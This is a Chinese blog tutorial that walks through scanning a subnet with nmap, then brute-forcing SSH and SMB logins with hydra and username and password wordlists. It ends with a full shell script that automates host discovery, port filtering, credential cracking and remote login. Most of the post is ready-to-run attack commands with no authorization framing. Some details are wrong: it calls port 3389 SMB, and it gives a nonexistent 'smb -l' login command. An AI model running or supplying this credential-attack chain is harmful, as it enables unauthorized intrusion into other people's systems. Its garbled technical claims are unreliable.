Linux下使用hydra获取linux和windows系统用户名和密码的教程

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/nuoya_1995/article/details/52303381

本文主要记录了在linux中使用hydra破解并获取某个网段中linux和windows系统的登录名和密码。其中使用到的工具,例如,弱密码词典、用户名词典、shell脚本我都会传到我的资源里面。

第一步:找到网段内存活的主机

使用nmap工具查找存活的主机并存到up.txt里面,具体代码如下:

在命令行输入:nmap -sn 172.18.16.0/24 > up.txt 

从up.txt里面过滤出ip地址存到ip.txt里面,代码如下:

cat up.txt | grep for | awk '{print $5}'>ip.txt


第二步:使用nmap工具扫描linux和windows的远程端口

linux系统:

cat /etc/ssh/sshd_config 命令查看linux的远程端口,linux的远程端口是22,ssh协议。

windows系统:

开始—运行–cmd下输入 netstat –nba ,命令查看linux的远程端口,windows的远程端口是3389,smb协议。

查到远程登陆窗口后,使用nmap扫描22和3389的端口,代码如下:

nmap -p22,3389 -iL ip.txt > res.txt

第三步:从结果里过滤出22端口开着的ip地址

从结果里过滤出22端口开着的ip地址,存放到sship.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt

sship.txt里面的ip地址都是ssh远程开着的linux系统,接下来我们只要用hydra得到它们的密码就可以远程登陆linux系统了。

第四步:从结果里过滤出3389端口开着的ip地址

从结果里过滤出3389端口开着的ip地址,存放到smbip.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt

与第三步类似,smbip.txt里面的ip地址都是smb远程开着的windows系统,接下来我们只要用hydra得到它们的密码就可以远程登陆windows系统了。

第五步:使用hydra暴力破解linux密码

在命令行输入以下命令:

hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt

这段shell使用了user.txt用户名词典和passwd.txt密码词典以及开启ssh服务的ip地址,使用hydra进行暴力破解,从暴破结果中过滤取出ip地址对应的用户名和密码。

第六步:使用hydra暴力破解windows密码

hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt

与第五步相仿,不同的只是协议和ip地址。

第七步:使用找到的密码远程登陆

linux远程连接命令:

ssh -l root 172.18.*.*

输入这个命令之后,系统会提示你输入密码passwd:,这时候你输入获取的密码就可以远程登陆了。

windows远程连接命令:

smb -l Administrator 172.18.*.*

根据提示输入密码,就可以远程登陆了。

最后,我把这些命令写成了一个shell,如下:

#!/bin/sh
para1=$#
para2=$1
if [ $para1 -eq 0 ]; then
  echo "请输入你的位置变量"
else
echo "-------------------stpe1 check up host list---------------------------"
echo "nmap -sn $para2 , please wait for moment......"
nmap -sn "$para2">up.txt
cat up.txt | grep for | awk '{print $5}'>ip.txt
echo "up host is done , save to up.txt"
echo "-------------------stpe2 port check 22 and 3389-----------------------"
echo "22 and 3389 port checking...  please wait for moment......"
nmap -p22,3389 -iL ip.txt > res.txt
echo "-------------------stpe3 select  22 port------------------------------"
echo "doing 22 save to sship.txt"
cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt
echo "-------------------stpe4 select  3389 port----------------------------"
echo "doing 3389 save to 3389ip.txt"
cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt


echo "-----------------------------stpe5 attack ssh------------------------"
hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt


echo "-------------------------stpe6 attack 3389---------------------------"
hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt


cat -n find.txt


fi

shell运行截图:


请大家谨慎使用!

展开阅读全文

没有更多推荐了,返回首页